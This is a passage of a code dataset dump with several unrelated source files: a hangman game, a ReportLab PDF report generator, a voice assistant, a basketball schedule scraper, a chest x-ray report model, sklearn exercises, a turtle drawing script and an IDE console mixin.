-> graph[u-1][v-1]=min(graph[u-1][v-1],w)\n\n#     for d in dijkstra(K, V, graph):\n#         print(d if d != INF else \"INF\")","repo_name":"kseungwoo/problem-solving","sub_path":"Programmers/Dijkstra/배달.py","file_name":"배달.py","file_ext":"py","file_size_in_byte":2106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"45244087802","text":"def jogar(): \r\n    print(\"*************************************\")\r\n    print(\"Bem vindo ao jogo!\")\r\n    print(\"*************************************\")\r\n    \r\n    palavra_chave = \"banana\"\r\n    \r\n    enforcou = False\r\n    acertou = False\r\n    \r\n    while (not enforcou and not acertou):\r\n        chute = input(\"Qual a letra?\")\r\n        index = 0\r\n        for letra in palavra_chave:\r\n            if chute == letra: \r\n                print(\"Encontrei a letra {} na posição {}\".format(letra, index))\r\n            index = index + 1\r\n        print(\"Jogando...\")\r\n    \r\n    print(\"Fim do jogo\")\r\nif (__name__ == \"__main__\"):\r\n    jogar()\r\n","repo_name":"diogopsa/Cursos_Alura","sub_path":"forca.py","file_name":"forca.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"18928006165","text":"import jinja2\nimport pandas as pd\nimport progressbar\nfrom PIL import Image as PILImage\nfrom os.path import basename, dirname, isfile\nfrom reportlab.lib.styles import getSampleStyleSheet, ParagraphStyle\nfrom reportlab.pdfgen import canvas\nfrom reportlab.platypus import Image, Paragraph\nfrom 
reportlab.pdfbase import pdfmetrics\nfrom reportlab.pdfbase.ttfonts import TTFont\nfrom reportlab.lib.fonts import addMapping\nfrom xml.etree import ElementTree\n\n\ndef year(num):\n if num is not None:\n return \"{:}\".format(round(num))\n return \"NA\"\n\n\ndef people(num):\n if num is not None:\n return \"{:,}\".format(round(num))\n return \"NA\"\n\ndef dollar(num):\n if num is not None:\n return \"${0:,.2f}\".format(float(num))\n return \"NA\"\n\ndef roundDollar(num):\n if num is not None:\n return \"${0:,}\".format(round(num))\n return \"NA\"\n\ndef percent(num):\n if num is not None:\n return \"{}%\".format(round(num))\n return \"NA\"\n\ndef roundInt(num):\n if num is not None:\n return round(float(num))\n return \"NA\"\n\n\n########################################################################\nclass ReportMaker(object):\n \"\"\"\"\"\"\n\n #----------------------------------------------------------------------\n def __init__(self, countries, template_folder, pdf_file):\n pdfmetrics.registerFont(TTFont('Geomanist', 'fonts/Geomanist-Regular.ttf'))\n pdfmetrics.registerFont(TTFont('Geomanist-Bold', 'fonts/Geomanist-Bold.ttf'))\n pdfmetrics.registerFont(TTFont('Geomanist-Italic', 'fonts/Geomanist-RegularItalic.ttf'))\n addMapping('Geomanist',0,0,'Geomanist')\n addMapping('Geomanist',0,1,'Geomanist-Italic')\n addMapping('Geomanist',1,0,'Geomanist-Bold')\n\n self.styles = getSampleStyleSheet()\n self.template_folder = template_folder\n templateLoader = jinja2.FileSystemLoader(searchpath=\"./{}/\".format(self.template_folder))\n templateEnv = jinja2.Environment(loader=templateLoader)\n templateEnv.filters['people'] = people\n templateEnv.filters['dollar'] = dollar\n templateEnv.filters['roundDollar'] = roundDollar\n templateEnv.filters['percent'] = percent\n templateEnv.filters['year'] = year\n templateEnv.filters['roundInt'] = roundInt\n TEMPLATE_FILE = \"template.xml.j2\"\n template = templateEnv.get_template(TEMPLATE_FILE)\n\n output = template.render(countries=countries)\n xml_file = \"./render/template.xml\"\n with open(xml_file, \"w\") as outfile:\n outfile.write(output)\n\n self.e = ElementTree.parse(xml_file).getroot()\n self.width, self.height = int(self.e.getchildren()[0].get(\"width\")), int(self.e.getchildren()[0].get(\"height\"))\n self.c = canvas.Canvas(pdf_file, pagesize=(self.width,self.height),pageCompression=1)\n self.fonts = {}\n for page in self.e.findall(\"page\"):\n for fontspec in page.findall(\"fontspec\"):\n font = {}\n font[\"size\"] = int(fontspec.get(\"size\"))\n font[\"color\"] = fontspec.get(\"color\")\n font[\"background\"] = fontspec.get(\"background\")\n if fontspec.get(\"indent\") is not None:\n font[\"indent\"] = fontspec.get(\"indent\")\n else:\n font[\"indent\"] = \"0\"\n if fontspec.get(\"padding\") is not None:\n font[\"padding\"] = fontspec.get(\"padding\")\n else:\n font[\"padding\"] = \"0\"\n self.fonts[fontspec.get(\"id\")] = font\n\n #----------------------------------------------------------------------\n def createDocument(self):\n \"\"\"\"\"\"\n for page in progressbar.progressbar(self.e.findall(\"page\")):\n self.width, self.height = int(page.get(\"width\")), int(page.get(\"height\"))\n self.c.setPageSize((self.width,self.height))\n for image in page.findall(\"image\"):\n src = self.template_folder+\"/\"+image.get(\"src\")\n if \"charts\" in src:\n chart_name = basename(src)\n chart_path = dirname(src)\n dest = chart_path+\"/reduced_\"+chart_name\n if not isfile(dest):\n pilImg = PILImage.open(src)\n size = 
(pilImg.size[0]/1.5,pilImg.size[1]/1.5)\n pilImg.thumbnail(size,PILImage.NEAREST)\n pilImg.save(dest,optimize=True)\n else:\n dest = src\n logo = Image(dest)\n logo.drawHeight = int(image.get(\"height\"))\n logo.drawWidth = int(image.get(\"width\"))\n logo.wrapOn(self.c, self.width, self.height)\n logo.drawOn(self.c, *self.coord(int(image.get(\"left\")),int(image.get(\"top\"))+int(image.get(\"height\")) ))\n for text in page.findall(\"text\"):\n if len(text.getchildren())==0:\n font = self.fonts[text.get(\"font\")]\n replacement = text.text\n\n if text.get(\"shrink\"):\n textLen = float(len(replacement))\n fontSizeAdj = int(font[\"size\"])\n heightAdj = int(text.get(\"height\"))*2 if textLen > 30 else int(text.get(\"height\"))\n width = int(text.get(\"width\"))\n else:\n fontSizeAdj = int(font[\"size\"])\n heightAdj = int(text.get(\"height\"))\n width = self.width\n\n style = ParagraphStyle(\n 'default',\n fontName=\"Geomanist\",\n leading=fontSizeAdj,\n fontSize=fontSizeAdj,\n borderPadding = int(font[\"padding\"]),\n textColor=font[\"color\"],\n backColor=font[\"background\"],\n firstLineIndent=int(font[\"indent\"]),\n )\n\n self.createParagraph(replacement, int(text.get(\"left\")), (int(text.get(\"top\"))+heightAdj), width,style)\n else:\n innerText = ElementTree.tostring(text.getchildren()[0])\n font = self.fonts[text.get(\"font\")]\n replacement = innerText\n\n if text.get(\"shrink\"):\n textLen = float(len(replacement))\n fontSizeAdj = int(font[\"size\"])\n heightAdj = int(text.get(\"height\"))*2 if textLen > 30 else int(text.get(\"height\"))\n width = int(text.get(\"width\"))\n else:\n fontSizeAdj = int(font[\"size\"])\n heightAdj = int(text.get(\"height\"))\n width = self.width\n\n style = ParagraphStyle(\n 'default',\n fontName=\"Geomanist\",\n leading=fontSizeAdj,\n fontSize=fontSizeAdj,\n borderPadding = int(font[\"padding\"]),\n textColor=font[\"color\"],\n backColor=font[\"background\"],\n firstLineIndent=int(font[\"indent\"]),\n )\n\n self.createParagraph(replacement, int(text.get(\"left\")), (int(text.get(\"top\"))+heightAdj), width, style)\n for line in page.findall(\"line\"):\n self.c.setDash(int(line.get(\"on\")),int(line.get(\"off\")))\n self.c.setStrokeColor(line.get(\"color\"))\n self.c.line(int(line.get(\"x1\")),self.height-int(line.get(\"y1\")),int(line.get(\"x2\")),self.height-int(line.get(\"y2\")))\n for button in page.findall(\"button\"):\n padtop = int(button.get(\"pt\")) if button.get(\"pt\") else 0\n padbottom = int(button.get(\"pb\")) if button.get(\"pb\") else 0\n padleft = int(button.get(\"pl\")) if button.get(\"pl\") else 0\n padright = int(button.get(\"pr\")) if button.get(\"pr\") else 0\n top = (self.height - int(button.get(\"top\")))+padtop\n bottom = ((top-padtop) - int(button.get(\"height\")))-padbottom\n left = int(button.get(\"left\"))-padleft\n right = ((left+padleft) + int(button.get(\"width\")))+padright\n rect = (left, bottom, right, top)\n self.c.linkAbsolute(\"\", button.get(\"href\"), rect, Border='[0 0 0]')\n for bookmark in page.findall(\"bookmark\"):\n self.c.bookmarkPage(bookmark.get(\"name\"),fit=\"FitR\",left=1,right=self.width, bottom=self.height-self.width, top=self.height)\n\n self.c.showPage()\n\n #----------------------------------------------------------------------\n def coord(self, x, y, unit=1):\n \"\"\"\n # http://stackoverflow.com/questions/4726011/wrap-text-in-a-table-reportlab\n Helper class to help position flowables in Canvas objects\n \"\"\"\n x, y = x * unit, self.height - y * unit\n return x, y\n\n 
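# e.g. coord(10, 20) maps a point given in top-left page coordinates to\n    # ReportLab's bottom-left origin as (10, self.height - 20), since ReportLab\n    # measures y upward from the bottom of the page\n    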
#----------------------------------------------------------------------\n def createParagraph(self, ptext, x, y, width, style=None):\n \"\"\"\"\"\"\n if not style:\n style = self.styles[\"Normal\"]\n p = Paragraph(ptext, style=style)\n p.wrapOn(self.c, width, self.height)\n p.drawOn(self.c, *self.coord(x, y))\n\n #----------------------------------------------------------------------\n def savePDF(self):\n \"\"\"\"\"\"\n self.c.save()\n\n#----------------------------------------------------------------------\nif __name__ == \"__main__\":\n csv_file = \"./data/countries_merged.csv\"\n countries_df = pd.read_csv(csv_file, keep_default_na=False, na_values=[\"\"])\n countries_df = countries_df.where(countries_df.notnull(), None)\n countries = countries_df.to_dict('records')\n doc = ReportMaker(countries, \"./final_template\", \"./render/p20_profiles.pdf\")\n doc.createDocument()\n doc.savePDF()\n","repo_name":"akmiller01/p20-profiles-2020","sub_path":"render.py","file_name":"render.py","file_ext":"py","file_size_in_byte":10053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71608316643","text":"import speech_recognition as sr\r\nimport pyttsx3\r\nimport datetime\r\nimport pywhatkit\r\nimport wikipedia\r\nimport pyjokes\r\nlistener = sr.Recognizer()\r\ncortana = pyttsx3.init()\r\n# voices = cortana.getProperty('voices')\r\n# cortana.setProperty('voice', voices[1].id)\r\n\r\ndef talk(text):\r\n cortana.say(text)\r\n cortana.runAndWait()\r\n\r\ndef take_command():\r\n try:\r\n with sr.Microphone() as source:\r\n print('Listening...')\r\n voice = listener.listen(source)\r\n command = listener.recognize_google(voice)\r\n command = command.lower()\r\n print(command)\r\n if 'cortana' in command:\r\n command = command.replace('cortana', ' ')\r\n #print(command)\r\n\r\n except:\r\n pass\r\n return command\r\n\r\ndef run_cortana():\r\n command = take_command()\r\n# Knowing_time\r\n if 'time' in command:\r\n time = datetime.datetime.now().strftime('%I:%M %p')\r\n print(time)\r\n talk('Current time is ' + time)\r\n# play_song_on_youtube\r\n elif 'play' in command:\r\n song = command.replace('play', '')\r\n talk('playing' + song)\r\n pywhatkit.playonyt(song)\r\n#tell_me_about_info_from_wikipedia\r\n elif 'tell me about' in command:\r\n look_for = command.replace('tell me about', ' ')\r\n info = wikipedia.summary(look_for, 1)\r\n print(info)\r\n talk(info)\r\n#tell_me_joke\r\n elif 'joke' in command:\r\n jokes = pyjokes.get_joke()\r\n print(jokes)\r\n talk(jokes)\r\n#when_did_not_understand\r\n else:\r\n talk('Sorry, I can not hear you but i can search it for you')\r\n pywhatkit.search(command)\r\n\r\nwhile True:\r\n run_cortana()","repo_name":"Dilshad-Jahan73/virtual-assistant-robot","sub_path":"Code.py","file_name":"Code.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"22137165468","text":"import requests\nfrom datetime import datetime, timedelta\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nfrom google.cloud import storage\nimport os\n\n\ndef get_games(startDate,endDate):\n ##########################################################################\n # Get Distinct Months for schedule to scrape\n ##########################################################################\n\n delta = endDate - startDate\n \n yearmonths = []\n for i in range(delta.days + 1):\n r = {}\n day = startDate + timedelta(days=i)\n r['monthname'] = 
day.strftime('%B').lower()\n        # NBA seasons are labeled by the year they end in, so Oct-Dec games\n        # belong to the following calendar year's schedule page\n        if day.month > 9:\n            r['year'] = day.year + 1\n        else:\n            r['year'] = day.year\n        if r not in yearmonths: \n            yearmonths.append(r)\n\n    schedule = []\n    for v in yearmonths:\n        year = str(v['year'])\n        month = v['monthname']\n        url = 'https://www.basketball-reference.com/leagues/NBA_' + year + '_games-' + month + '.html'\n        #print(url)\n\n        html = requests.get(url)\n\n        if html.ok:\n            soup = BeautifulSoup(html.content, 'html.parser') \n        else:\n            print(f'No data for {month} {year} because encountered error code {html.status_code}')\n            continue\n\n        rows = soup.find('table', id=\"schedule\").find('tbody').find_all('tr')\n\n        for row in rows:\n            game_date_node = row.find('th',{\"data-stat\": \"date_game\"})\n            if game_date_node is not None:\n\n                game_date = datetime.strptime(game_date_node.text, '%a, %b %d, %Y').date()\n                if game_date >= startDate and game_date <= endDate:\n                    \n                    r = {}\n                    \n\n                    v1 = row.find('th',{\"data-stat\": \"date_game\"})\n                    \n                    r['game_date'] = datetime.strptime(v1.text, '%a, %b %d, %Y').strftime(\"%Y-%m-%d\")\n                    r['game_day'] = datetime.strptime(v1.text, '%a, %b %d, %Y').strftime(\"%A\")\n\n                    v2 = row.find('td',{\"data-stat\": \"game_start_time\"})\n                    r['game_start_time'] = v2.text if v2 else None\n\n                    v3 = row.find('td',{\"data-stat\": \"visitor_team_name\"})\n                    r['visitor_team_name'] = v3.text\n                    r['away_abbr'] = v3['csk'].split('.')[0]\n\n                    v4 = row.find('td',{\"data-stat\": \"home_team_name\"})\n                    r['home_team_name'] = v4.text\n                    r['home_abbr'] = v4['csk'].split('.')[0]\n\n                    if r['game_start_time']:\n                        v12 = r['away_abbr'] + r['game_date'].replace('-','') + r['home_abbr'] + r['game_start_time'].replace(':','')\n                    else:\n                        v12 = r['away_abbr'] + r['game_date'].replace('-','') + r['home_abbr']\n                    r['game_key'] = v12 if v12 else None\n\n                    schedule.append(r)\n    \n    return schedule\n\ndef write_to_bucket(request):\n    \n    # Use schedule days if in request, otherwise default to 2 weeks (14 days)\n    try:\n        if isinstance(request, dict):\n            request_json = request\n        else:\n            request_json = request.get_json() \n        if request_json and 'ScheduleDays' in request_json:\n            schedule_days = request_json['ScheduleDays']\n        else:\n            schedule_days = 14\n    except Exception as e:\n        raise ValueError(\"Invalid input. Please provide ScheduleDays as an integer\") from e\n
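    \n    # e.g. a trigger payload like {'ScheduleDays': 7} (hypothetical value)\n    # would fetch one week of upcoming games\n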
    # Calculate begin/end dates based on schedule days\n    startDate = (datetime.now()).date()\n    endDate = (startDate + timedelta(days=schedule_days))\n    schedule = get_games(startDate,endDate) \n    \n    # Upload schedule to default app engine storage bucket\n    game_date = pd.DataFrame(schedule)\n    client = storage.Client()\n    bucket_name = os.environ.get(\"CLOUD_STORAGE_BUCKET\")\n    bucket = client.bucket(bucket_name)\n    bucket.blob('static/upcoming.json').upload_from_string(game_date.to_json(), 'text/json')\n\n    return f'Successfully updated bucket with upcoming games for the next {schedule_days} days'\n","repo_name":"cwilbar04/gcp-end-to-end-nba-predictions","sub_path":"get_schedule/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"8871376542","text":"#Ex.2\nimport turtle\n# Function takes turtle t, a number of sides n, each side of length sz\ndef draw_poly(t, n, sz):\n    \"\"\"Make turtle t draw a regular polygon with side sz.\"\"\"\n    a = 360/n\n    for i in range(n):\n        t.forward(sz)\n        t.left(a)\n\n\n# Create turtle tess\ntess = turtle.Turtle()\n# pink pen color\ntess.pencolor(\"lightpink\")\n# pen size\ntess.pensize(3)\n# Configure the window and its attributes\nwn = turtle.Screen()\nwn.bgcolor(\"lightgreen\")\nwn.title(\"tess meets a function\")\n# Test that calls the function to draw a regular polygon\ndraw_poly(tess, 8, 50)\nwn.mainloop()\n#############################################################","repo_name":"wrgyotoku/CES-22","sub_path":"LISTA1/Ex2.py","file_name":"Ex2.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"9926703958","text":"import torch\nimport torch.nn as nn\nimport torchvision.models as models\nfrom transformers import (\n    BlipForConditionalGeneration,\n    Trainer, \n    TrainingArguments,\n    DataCollatorForLanguageModeling\n) \n\nfrom config import *\nimport paths \n\nclass ScanVisualFeatures(nn.Module):\n    def __init__(self):\n        super(ScanVisualFeatures, self).__init__()\n        self.model, self.features, self.avg_pool = self.get_model()\n\n    def get_model(self):\n        '''\n        Model for extracting visual features from chest x-ray image\n\n        Returns:\n            model(nn.Sequential): visual feature extractor model\n            features(int): Number of input features to the fully connected layer in densenet121\n            avg_pool(nn.AvgPool2d): Average pooling layer \n        '''\n        # Extract convolutional layers from densenet121\n        densenet = models.densenet121(weights='DEFAULT')\n        layers = list(densenet.features)\n        # Extract number of input features to FC layer in densenet\n        features = densenet.classifier.in_features\n\n        # Create a sequential model with the extracted convolutional layers\n        model = nn.Sequential(*layers)\n        # Apply average pooling\n        avg_pool = torch.nn.AvgPool2d(kernel_size=7, stride=1, padding=0)\n\n        return model, features, avg_pool\n\n    def forward(self, image):\n        '''\n        Forward pass through densenet121 for extracting visual features\n\n        Args:\n            image(tensor): a tensor of chest x-ray image\n\n        Returns:\n            out_features(torch.Tensor): average pooled features of the image\n        '''\n        # Get features from last convolutional layer\n        features = self.model(image)\n        # Apply average pooling\n        out_features = self.avg_pool(features).squeeze()\n\n        return out_features\n\n
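# A minimal sketch of wiring the extractor and classifier together\n# (batch size, image size and the 210-tag count are assumed values):\n# extractor = ScanVisualFeatures()\n# classifier = TagsClassifier(classes=210, in_features_dim=extractor.features)\n# probs = classifier(extractor(torch.randn(2, 3, 224, 224)))  # -> (2, 210)\n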
\nclass TagsClassifier(nn.Module):\n    def __init__(self, classes, in_features_dim):\n        '''\n        Single layer linear classifier for tags classification\n\n        Args:\n            classes(int): Number of output classes\n            in_features_dim(int): Number of input features to classification layer\n        '''\n        super(TagsClassifier, self).__init__()\n        self.classifier = nn.Linear(in_features=in_features_dim, out_features=classes)\n        self.activation = nn.Softmax()\n        self.init_weight()\n\n    def init_weight(self):\n        # Initialize weights of linear layer in classification model\n        self.classifier.weight.data.uniform_()\n        self.classifier.bias.data.fill_(0)\n\n    def forward(self, avg_features):\n        '''\n        Forward pass through classification model\n\n        Args:\n            avg_features(torch.Tensor): a tensor of average pooled features of image\n\n        Returns:\n            pred_prob(torch.Tensor): A tensor representing the probabilities of the classes for given input image features\n        '''\n        pred_prob = self.activation(self.classifier(avg_features))\n        return pred_prob\n\n\nclass ReportGeneration():\n    def __init__(self):\n        # Initialize conditional generation model for report generation\n        self.model = BlipForConditionalGeneration.from_pretrained('nathansutton/generate-cxr')\n\n    def finetuning(self, report_tokenizer, report_processor, train, valid):\n        '''\n        Fine tune model on our chest x-ray dataset\n\n        Args:\n            report_tokenizer(blip tokenizer): tokenizer of blip processor\n            report_processor(blip processor): blip processor\n            train(torch.Dataset): training dataset\n            valid(torch.Dataset): validation dataset\n\n        Returns:\n            trainer(Trainer): Fine tuned trainer object\n        '''\n        # Define training arguments for fine tuning\n        training_args = TrainingArguments(\n            num_train_epochs=5,\n            evaluation_strategy='epoch',\n            per_device_eval_batch_size=16,\n            per_device_train_batch_size=16,\n            lr_scheduler_type='cosine_with_restarts',\n            warmup_ratio=0.1,\n            learning_rate=1e-3,\n            save_total_limit=1,\n            output_dir=paths.logs_directory_path + 'report_generation'\n        )\n\n        data_collator = DataCollatorForLanguageModeling(\n            tokenizer=report_tokenizer,\n            mlm=False\n        )\n        # Define trainer object for fine tuning blip conditional generation model\n        trainer = Trainer(\n            args=training_args,\n            train_dataset=train,\n            eval_dataset=valid,\n            data_collator=data_collator,\n            tokenizer=report_processor.tokenizer,\n            model=self.model\n        )\n        # Train model\n        trainer.train()\n\n        return trainer\n\n","repo_name":"Ananya-AJ/Chest-Xray_Medical_Report_generation","sub_path":"Code/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4640,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"35513653150","text":"import pandas as pd\nimport numpy as np\nimport timeit\n\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.linear_model import Ridge \nfrom sklearn.linear_model import Lasso\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.model_selection import cross_val_score \nfrom sklearn.metrics import mean_squared_error \nfrom sklearn.preprocessing import MinMaxScaler \nfrom sklearn.pipeline import make_pipeline \nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n\npd.options.display.max_rows=None\npd.options.display.max_columns=None\npd.options.display.width= 175\n\n\ndf = pd.read_csv('/Users/user/Downloads/ML Analytics/ML Analytics - Course 3/social_honeypot_sample.csv')\n\ny = df['Polluter']\nX = 
df[['LengthOfDescriptionInUserProfile','LengthOfScreenName','NumberOfFollowings','NumberOfFollowers','NumberOfTweets']] # used for Question 7\n#X = df['Tweet'] # used for Question 8,9,10,11\n\nX_train, X_test, y_train, y_test = train_test_split(X,y,test_size=0.25, random_state=25)\n\n\ndef Question_7():\n    '''\n    Create a logistic regression using the above features and default parameters (l2 penalty and C=1). What's the mean precision score from 10-fold cross-validation? Round to three decimal places.\n    '''\n    \n    model = LogisticRegression(penalty='l2',C=1)\n    \n    val_scores = cross_val_score(model, X_train, y_train, scoring='precision', cv=10)\n    \n    print('Q7:', round(np.mean(val_scores),3)) # Correct: 0.889\nQuestion_7()\n\n\n\ndef Question_8():\n    '''\n    First, you'll take a simple bag of words approach. Create a logistic regression on the training set with CountVectorizer(). Use default parameters. Conduct 10-fold cross-validation, using precision for scoring.\n\nWhat mean precision does this model get? Round to three decimal places.\n    '''\n    vectorizer = CountVectorizer()\n    X_new = vectorizer.fit_transform(X_train) \n    \n    model = LogisticRegression()\n    \n    val_scores = cross_val_score(model, X_new, y_train, scoring='precision', cv=10)\n    print('Q8: ', round(np.mean(val_scores),3)) # Correct: 0.749\n    \n    \nQuestion_8()\n\ndef question_9():\n    '''\n    Next, create a logistic model where you preprocess the data with TfidfVectorizer and then evaluate it with 10-fold cross validation. Recall that you may get an overly-optimistic evaluation if you use the Tfidfvectorizer on all of X_train, and then conduct cross-validation on just the logistic regression. Instead, during cross-validation, you'll want to fit the vectorizer on just the training data, fit the regression on the training data, and then test it on the hold-out set.\n\n    To do this, you'll need to create a pipeline with the vectorizer and the logistic regression, and conduct the cross-validation using the pipeline. To start with, again, use default parameters. What mean precision do you get? Round to three decimal places.\n    '''\n    \n    tfidf_vectorizor = TfidfVectorizer()\n    X_vector = tfidf_vectorizor.fit_transform(X_train)\n    \n    model = LogisticRegression().fit(X_vector, y_train) \n    \n    pipeline = make_pipeline(tfidf_vectorizor, model) #NOTE: My pipeline attributes were initially incorrect. I was passing the X_vector AND NOT the tfidf_vectorizor. Now the vectorizor is being passed.\n    # https://stackoverflow.com/questions/58543937/how-to-save-tfidf-vectorizer-in-scikit-learn\n    \n    val_score = cross_val_score(pipeline, X_train, y_train, scoring='precision', cv=10)\n    print('Q9: ', round(np.mean(val_score),3)) #Correct: 0.747\n    \n    \nquestion_9()\n\ndef question_10():\n    '''\n    Conduct a Grid Search to find the best values for these parameters. Use precision as the scoring method, but this time only do 5-fold cross-validation to help with the computation time.\n\n    If you need to understand how the parameters in the parameter grid for the Grid Search need to be named, you can use my_grid_search.estimator.get_params().keys() for a list of the names of the parameters.\n\n    What's the best score from the Grid Search? Round to three decimal places.\n    '''\n    start_time = timeit.default_timer()\n    \n    tfidf_vectorizor = TfidfVectorizer()\n    \n    model = LogisticRegression() # The model DOES NOT need to be fit PRIOR to being fed into the pipeline. Fitting it before the pipeline only slows down the code. 
\n    \n    #parameters = {'tfidfvectorizer__max_df':(0.7,0.8,0.9,1.0),\n                  #'tfidfvectorizer__min_df':(1,5,10),\n                  #'tfidfvectorizer__ngram_range':[(1,1),(1,2)],\n                  #'tfidfvectorizer__use_idf':['True','False']}\n    \n    parameters = {'tfidfvectorizer__max_df':[0.7],\n                  'tfidfvectorizer__min_df':[5],\n                  'tfidfvectorizer__ngram_range':[(1,2)],\n                  'tfidfvectorizer__use_idf':['True']}    \n    \n    pipeline = make_pipeline(tfidf_vectorizor, model) #NOTE: My pipeline attributes were initially incorrect. I was passing the X_vector AND NOT the tfidf_vectorizor. Now the vectorizor is being passed.\n    # https://stackoverflow.com/questions/58543937/how-to-save-tfidf-vectorizer-in-scikit-learn    \n    #print(pipeline.get_params().keys())\n    \n    grid_search = GridSearchCV(estimator=pipeline, param_grid=parameters , scoring='precision', cv=5)\n    grid_search.fit(X_train, y_train)\n    X_tweet = pd.Series(['Everything is getting better. http://bit.ly/6DcsUR'])\n    print('Q10: ', round(grid_search.best_score_,3))\n    print('Q11: ', grid_search.best_estimator_.steps)\n    print('Q12: ', grid_search.predict_proba(X_tweet))\n    \n    print('Total time: ', timeit.default_timer() - start_time)\n    #Correct: Q10: 0.753\n    #Correct: Q11: [('tfidfvectorizer', TfidfVectorizer(max_df=0.7, min_df=5, ngram_range=(1, 2), use_idf='True')), ('logisticregression', LogisticRegression())]\n    #Correct: Q12: [[0.42529456 0.57470544]]\n    \nquestion_10()\n'''\nQ8: 0.749\nQ9: 0.747\nQ10: 0.753\nQ11: [('tfidfvectorizer', TfidfVectorizer(max_df=0.7, min_df=5, ngram_range=(1, 2), use_idf='True')), ('logisticregression', LogisticRegression())]\nQ12: [[0.42529456 0.57470544]]\nTotal time: 1.4935354730000006\n'''\n\n\n\n","repo_name":"dervinfro/Machine-Learning-Analytics","sub_path":"MLA_Course_3_Week_3_QUIZ_Part_2.py","file_name":"MLA_Course_3_Week_3_QUIZ_Part_2.py","file_ext":"py","file_size_in_byte":6244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"13864616409","text":"from utils.pixmapcache import getIcon\nfrom utils.runparams import RUN, PROFILE, DEBUG\nfrom .qt import QApplication, QCursor, Qt, QTabBar\n\n\nclass MainWindowRedirectedIOMixin:\n\n    \"\"\"Main window redirected IO mixin\"\"\"\n\n    def __init__(self):\n        self.redirectedIOConsole = None\n        self.__newRunIndex = -1\n        self.__newProfileIndex = -1\n        self.__newDebugIndex = -1\n\n    def _initRedirectedIO(self):\n        \"\"\"Connects the signals etc.\"\"\"\n        # Only the redirected IO consoles are closable\n        self._bottomSideBar.sigTabCloseRequested.connect(self.__onCloseRequest)\n\n    def __onCloseRequest(self, index):\n        \"\"\"User wants to close a redirected IO console\"\"\"\n        self._bottomSideBar.removeTab(index)\n\n    def __getNewRunIndex(self):\n        \"\"\"Provides the new run index\"\"\"\n        self.__newRunIndex += 1\n        return self.__newRunIndex\n\n    def __getNewProfileIndex(self):\n        \"\"\"Provides the new profile index\"\"\"\n        self.__newProfileIndex += 1\n        return self.__newProfileIndex\n\n    def __getNewDebugIndex(self):\n        \"\"\"Provides a new debug console index\"\"\"\n        self.__newDebugIndex += 1\n        return self.__newDebugIndex\n\n    def __getCaptionNameTooltip(self, kind):\n        \"\"\"Provides the tab caption, name and tooltip\"\"\"\n        if kind == PROFILE:\n            index = str(self.__getNewProfileIndex())\n            return ('Profiling #' + index, 'profiling#' + index,\n                    'Redirected IO profile console #' + index + ' (running)')\n        if kind == RUN:\n            index = str(self.__getNewRunIndex())\n            return ('Run #' + index, 'running#' + index,\n                    'Redirected IO run console #' + index + ' (running)')\n        index = 
str(self.__getNewDebugIndex())\n return ('Debug #' + index, 'debugging#' + index,\n 'Redirected IO debug console #' + index + ' (running)')\n\n def addIOConsole(self, widget, consoleType):\n \"\"\"Installs a new widget at the bottom\"\"\"\n if consoleType not in [RUN, PROFILE, DEBUG]:\n raise Exception('Undefined redirected IO console type')\n\n caption, name, tooltip = self.__getCaptionNameTooltip(consoleType)\n\n widget.sigKillIOConsoleProcess.connect(self.__onKillIOConsoleProcess)\n widget.sigSettingsUpdated.connect(self.onIOConsoleSettingsUpdated)\n\n self._bottomSideBar.addTab(\n widget, getIcon('ioconsole.png'), caption, name, None)\n self._bottomSideBar.tabButton(widget, QTabBar.RightSide).hide()\n self._bottomSideBar.setTabToolTip(name, tooltip)\n self._bottomSideBar.show()\n self._bottomSideBar.setCurrentTab(name)\n self._bottomSideBar.raise_()\n widget.setFocus()\n\n def __onKillIOConsoleProcess(self, procuuid):\n \"\"\"Kills the process linked to the IO console\"\"\"\n self._runManager.kill(procuuid)\n\n def onIOConsoleSettingsUpdated(self):\n \"\"\"Initiates updating all the IO consoles settings\"\"\"\n index = self._bottomSideBar.count - 1\n while index >= 0:\n widget = self._bottomSideBar.widget(index)\n if hasattr(widget, 'procuuid'):\n if hasattr(widget, 'consoleSettingsUpdated'):\n widget.consoleSettingsUpdated()\n index -= 1\n\n def __onClientStdout(self, data):\n \"\"\"Triggered when the client reports stdout\"\"\"\n self._bottomSideBar.show()\n self._bottomSideBar.setCurrentTab('ioredirect')\n self._bottomSideBar.raise_()\n self.redirectedIOConsole.appendStdoutMessage(data)\n\n def __onClientStderr(self, data):\n \"\"\"Triggered when the client reports stderr\"\"\"\n self._bottomSideBar.show()\n self._bottomSideBar.setCurrentTab('ioredirect')\n self._bottomSideBar.raise_()\n self.redirectedIOConsole.appendStderrMessage(data)\n\n def __ioconsoleIDEMessage(self, message):\n \"\"\"Sends an IDE message to the IO console\"\"\"\n self._bottomSideBar.show()\n self._bottomSideBar.setCurrentTab('ioredirect')\n self._bottomSideBar.raise_()\n self.redirectedIOConsole.appendIDEMessage(message)\n\n def __onClientRawInput(self, prompt, echo):\n \"\"\"Triggered when the client input is requested\"\"\"\n self._bottomSideBar.show()\n self._bottomSideBar.setCurrentTab('ioredirect')\n self._bottomSideBar.raise_()\n self.redirectedIOConsole.rawInput(prompt, echo)\n self.redirectedIOConsole.setFocus()\n\n def __onUserInput(self, userInput):\n 